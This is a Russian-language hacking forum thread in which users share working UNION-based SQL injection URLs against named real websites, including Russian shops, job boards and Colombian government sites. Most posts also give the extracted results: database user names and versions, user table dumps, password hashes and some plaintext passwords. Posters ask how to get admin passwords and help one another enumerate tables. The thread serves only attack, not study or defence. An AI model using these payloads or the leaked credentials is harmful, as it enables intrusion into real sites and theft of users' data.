SQL Инъекции

h__p://mp3.p6.ru/index.php?act=album&id=1121039%20union%20select%201,version(),3,4,5,6,7,8/*
нашёл случайно, как обычно.
доступа к mysql нет.

 

http://ont.by/index.php?id_issue=-5+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11/*
Даальше застрял ребят помогите!
как выудить пароль на админку к сайту?
Или, что нибудь замутить с ним

 

Code:

http://www.pille-palle.net/forum2/forum_show.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a,version(),0x3a,database()),10,11,12,13/*

[email protected]:5.0.32-Debian_7etch1~bpo.1-logille_palle_net

Code:

http://www.pille-palle.net/forum2/forum_show.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user,0x3a,passwort),10,11,12,13+from+PPuser/*

fundrugs =)

Code:

http://www.russian-online.net/boltalka/current_message.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12/*

web59@localhost:5.0.41:usr_web59_4

Code:

http://www.russian-online.net/boltalka/current_message.php?id=-1+union+select+1,2,concat(username,0x3a,passwd,0x3a,email),4,5,6,7,8,9,10,11,12+from+usr_web59_1.tbBenutzer/*

polinux:123456[email protected] polina:12345[email protected]:12345[email protected]

 

sql

//www.interomania.ru - сайт болелов Интера

есть дырка в news.php, но скрипт от юзера [email protected], доступа никуда кроме z34244_news нет, аналогично со скриптом main.table.php - дырка

lдоступ к базе z34244_stat

потом нашлась гостевуха и таблицы с пользователями

вывод посимвольный

 

Посмотри предыдущий пост до моего.

 

Tonikk:120853239:2e4b6dc525afb5cb

 

код:

http://www.emubands.com/bands.php?band_id=-202+union+select+1,concat(username,0x3a,password)+from+user/*

код:

http://www.emubands.com/bands.php?band_id=-202+union+select+1,concat(username,0x3a,password)+from+band/*

колонки с мылом подобрать не смог,а может ее и нет вовсе?
p.s особо не искал

 

turistua.com
Интернет-магазин товаров для туризма.

Code:

http://shop.turistua.com/index.php?x_id=1+union+select+name+from+admin/*

____________________________________________________
***********************************************

 

Code:

http://www.m-logos.ru/seminars/info.phtml?id=-1+union+select+1,2,3,4,version(),user(),7,8,9,database(),11,12,13,14,15,16,17,18,19,20/*

4.0.27-log///[email protected]///mlogos

 

www.timo4.com

Code:

http://www.timo4.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(version(),0x3a,database(),0x3a,user()),14,15,16,17,18,19,20,21,22,23,24,25,26/*&today=2005.07.27&lang=rus

4.1.22:timo4:u_timo4@localhost
Админ:

Code:

http://www.timo4.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(user,0x3a,pass),14,15,16,17,18,19,20,21,22,23,24,25,26+from+users+limit+0,1/*&today=2005.07.27&lang=rus

Ardel:50bcc2c899839223f5fb242b8c215d20

 

www.job.uralmedia.ru - работа на Урале

Code:

http://www.job.uralmedia.ru/index.php3?action=view_vacancy&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(version(),0x3a,database(),0x3a,user()),15,16,17,18,19,20,21,22,23,24,25/*

4.0.24_Debian-1:job:Chie1heingaephee@localhost
Таблицы подобрать не смог.

 

chelindustry.ru - Предприятия Южного Урала

Code:

http://chelindustry.ru/podrob_per.php?id_p=255&rr=-1+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7/*

4.0.26:helg:helg@localhost
Таблицы не поддаются

 

http://www.volganin.net - универсальная доска объявлений Челябинска

Code:

http://www.volganin.net/ind.php?id_typ=-1+union+select+1,2,3,4,5,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*&regword=id_gorod=59&tr=1

4.1.14-log:volgani8_base1:volgani8_Alex22@localhost

 

Code:

http://www.corporinoquia.gov.co/masinfo.php?id=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13/*

corporin_impacto@localhost:4.1.22-standard:corporin_acg

Code:

http://www.fondomixtoculturaquindio.gov.co/vercontenido.php?id=-1+union+select+1,2,3,4,5,6,7,concat(user(),0x3a,version(),0x3a,database())/*

rhisshos_fmixto@localhost:4.1.22-standard-log:rhisshos_fondomixto

Code:

http://www.redehospitalbaq.gov.co/ver_noticia.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9/*

redehco2@localhost:4.1.21:redehospitalbaq_gov_co_-_redehospital

 

www.oilworld.ru

Code:

http://www.oilworld.ru/tender.php?domain=-1+union+select+concat(version(),0x3a,database(),0x3a,user())/*

5.0.27-log: oilworld: oilworld@localhost
62 таблицы:

Code:

http://www.oilworld.ru/tender.php?domain=-1+union+select+table_name+from+information_schema.tables+limit+61,1/*

Юзеры (имя,логин,пасс,мыло):

Code:

http://www.oilworld.ru/tender.php?domain=-1+union+select+concat(name,0x3a,login,0x3a,psw,0x3a,email)+from+users+limit+380,1/*

chelsi.ru - Челябинская служба информации

Code:

http://job.chelsi.ru/view_vac.php?id=-1+union+select+1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

4.1.20-lk-log:chelsiru_job:chelsiru_job@localhost

 

Code:

http://www.jetphotos.net/viewphoto.php?id=-6089343+UNION+SELECT+1,2,3,4,5,6,7,USER(),version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

USER: hotrodpi_root@rpweb1p

Дальше не мог откапать..

 

http://www.jetphotos.net/viewphoto.php?id=-6089343+UNION+SELECT+1,2,3,4,5,6,7,table_name,table_schema,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+information_schema.tables+limit+1,1/*
Вот дальше. Странно, почему не смог дальше? Пятая версия мускула, не нужно ничего подбирать!

 

Code:

http://www.1234567.ru/topic.html?topic=35/**/UNION/**/SELECT/**/1,null,concat(cl_email,char(58),cl_pass)/**/From/**/clients/**/where/**/cl_email/**/like/**/CHAR(37,64,37)/**/limit/**/223403,1/*

 

а там только две базы - убери table_schema или поставь where table_schema = , и думаю всё получится!

 

Code:

http://intercar.com.ua/index.php?id=-19+UNION+SELECT+1,2,version(),USER(),5,6/*